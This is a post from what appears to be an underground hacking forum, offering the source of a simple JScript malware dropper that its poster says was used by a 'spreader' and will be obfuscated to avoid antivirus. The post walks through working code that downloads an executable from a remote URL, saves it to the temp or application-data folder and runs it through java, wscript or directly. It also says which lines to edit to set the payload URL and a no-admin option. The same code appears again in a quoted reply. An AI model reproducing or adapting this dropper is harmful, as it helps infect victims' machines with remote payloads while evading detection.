Welcome, Guest!

Let's emphasize the most important rules of this community: advertising is forbidden, data related to Pakistan is forbidden, and we do not and will not have a trading platform.

You can share your leaks and earn credits. To use the forum without restrictions, you need to upgrade your profile. Before creating new topics and posts, please read the possible errors and rules in the "Help" section.

Malware Simple Malware JS Dropper Source Code | evil-zone.org | 2024

For Malware Discussion
Anony

Anony

Owner
Staff member
Admin
Community
LV
0
 
Joined
Jun 2, 2024
Messages
1,876
Awards
4
EvilCoin
108,454
Crypto
0
Points
9,287

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


To view the content, you need to Sign In or Register.
To view the content, you need to Sign In or Register.

 
Last edited by a moderator:
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
wow
 
You must log in or register to reply here.
Back
Top
AdBlock Detected

We get it, advertisements are annoying!

Sure, ad-blocking software does a great job at blocking ads, but it also blocks useful features of our website. For the best site experience please disable your AdBlocker.

I've Disabled AdBlock    No Thanks